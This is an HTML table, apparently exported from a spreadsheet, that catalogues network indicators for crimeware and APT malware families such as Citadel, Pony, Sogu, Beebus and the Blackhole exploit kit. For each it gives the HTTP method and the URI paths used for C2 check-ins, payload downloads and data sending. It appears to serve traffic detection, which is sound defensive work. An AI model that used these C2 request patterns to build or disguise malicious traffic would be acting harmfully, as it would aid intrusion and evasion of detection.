<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Kuluoz.B downloader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Kuluoz.B downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php?r=gate&fq=acc0e9de&group=sl15&debug=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Ranbyus / Triton (Spy, Banking, smart cards)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Ranbyus / Triton (Spy, Banking, smart cards)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/releases/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/releases/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Urausy (Ransomware)"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Urausy (Ransomware)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ixjxqn-jtixjx-qnjt_tfdhgj-opjx-gxytfqbqgsusltnojtyhsn_syvrzh-htof-clgowkblrzrqfrgsuqgdit_ruky_.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Glasses"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Glasses</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ewpindex.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ewpindex.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRAT</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/index000000001.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index000000001.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"LURK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">LURK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"LURK0........x.kf.e.apgpbpa0c..#........"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">LURK0........x.kf.e.apgpbpa0c..#........</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"DNSWatch / Protux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSWatch / Protux</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/dns/dnslookup?la=en&host=picture.ucparlnet. com&type=A&submit=Resolve</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"DNSWatch / Protux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSWatch / Protux</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/news.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/news.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"DNSWatch / Protux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSWatch / Protux</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/PHqgHumeay5705.mp3"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/PHqgHumeay5705.mp3</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Andromeda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Andromeda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/new/gate.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/new/gate.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Citadel"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Citadel</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/g.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/g.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Citadel (Zbot var)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Citadel (Zbot var)</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/C270suqdh/file.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/C270suqdh/file.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Pony loader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Pony loader</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/ponyb/gate.php HTTP/1.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ponyb/gate.php HTTP/1.0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Reedum"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Reedum</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"APT1 WEBC2_RAVE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT1 WEBC2_RAVE</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/comp/sem/resources.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/comp/sem/resources.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"backdoor ?"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">backdoor ?</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/18110123/page_32262 308.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/18110123/page_32262 308.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Banechant 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Banechant 1</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/IGKKT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/IGKKT</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Banechant payload dl 2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Banechant payload dl 2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/adserv/logo.jpg HTTP /1.1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/adserv/logo.jpg HTTP /1.1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/windosdate/v6/default.aspx?ln=en-us"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/windosdate/v6/default.aspx?ln=en-us</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus C2 checkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus C2 checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/asp?XAAAAM4w5jmIa_kMZlr67o8jettxsYA8dZge NAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus C2 checkin"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus C2 checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/asp?XAAAAM4w5jmOS_kMZlr67o8jettxsYA8d ZgeNAHes-Nn5p-6AFUD6yncpz5AL6wAAA==p=1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Beebus data send"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Beebus data send</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/s/asp?__ uLBwO1bAMKBgG2BQAAAAEAAAACAAAAAAAAAG9zYW11 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA VwBJAE4ARABPAFcAUwBNAEEAQQBOAEU AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA==p=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"Blackhole 2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackhole 2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fded177fe12651bb038f3f11b01c4168/q.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fded177fe12651bb038f3f11b01c4168/q.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1799.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1799.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/3961.html\nCookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/3961.html<br />Cookie: Y29tbWFuZD1HZXRDb21tYW5kO2NsaWVudGtle T0zOTU0 O2hvc3RuYW1lPXZpY3RpbTs=</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/8223.asp (also can be like /2007.asp,/2013.asp etc"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/8223.asp (also can be like /2007.asp,/2013.asp etc</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Cookies /Cookiebag / Dalbot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cookies /Cookiebag / Dalbot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/indexs.zip"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/indexs.zip</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Coswid"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Coswid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/old/google.png"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/old/google.png</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"CVE-2012-0754 SWF in DOC"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CVE-2012-0754 SWF in DOC</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/test.mp4"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/test.mp4</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"CVE-2012-0779"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CVE-2012-0779</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/essais.swf?info=789c333230d13331d53337d63 3b3b432313106001afa0338&infosize=00FC0000</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Darkmegi"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Darkmegi</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/20111230.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/20111230.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Darkness DDos v8g"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Darkness DDos v8g</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.php?uid=587609&ver=8g%20XP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php?uid=587609&ver=8g%20XP</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Depyot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Depyot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/new/3d/d/pdf.php?id=2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/new/3d/d/pdf.php?id=2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?id=000f6b50"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?id=000f6b50</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?id=3109c2a2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?id=3109c2a2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?product=windows"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?product=windows</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"DirtJumper DDoS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DirtJumper DDoS</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/678/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/678/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dirtjumper ddos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dirtjumper ddos</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/boi854tr4w.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/boi854tr4w.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"DNSChanger"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">DNSChanger</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg=="]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/d56sc1d56scd56sc1.php?ini= v22Mmjy0SYXyWTI0tQ0QQOdqOb68 J9I6ModWQnN1eE1VXw/T3BWOyTujBlrHIQqMgMqV75 0QegiB MF4XAHPzbYqRtufQpaX/M/trvO7ukg==</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Downloader BMP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Downloader BMP</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/evil.bmp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/evil.bmp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Einstein"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Einstein</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gttfi.php?id=019451425260376469&ext =YmFkc3R1ZmYuZGxs</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Einstein data send"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Einstein data send</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/gttfi.php?id=019451425260376469& ext=ixioJXXJFCRrrDatKHhK</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME EK"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME EK</span></td><td data-sheets-value="[null,2,"EK - Blackhole 2 landing"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">EK - Blackhole 2 landing</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/news/default-php-version.php?mdm=30:1g:2v:1f:1o& xguc= 3b:3i:39: 35&nze=1l:1f:30:1l:2v:30:1m:2v:1n:30&bhn=lixvdd</span></td></tr>
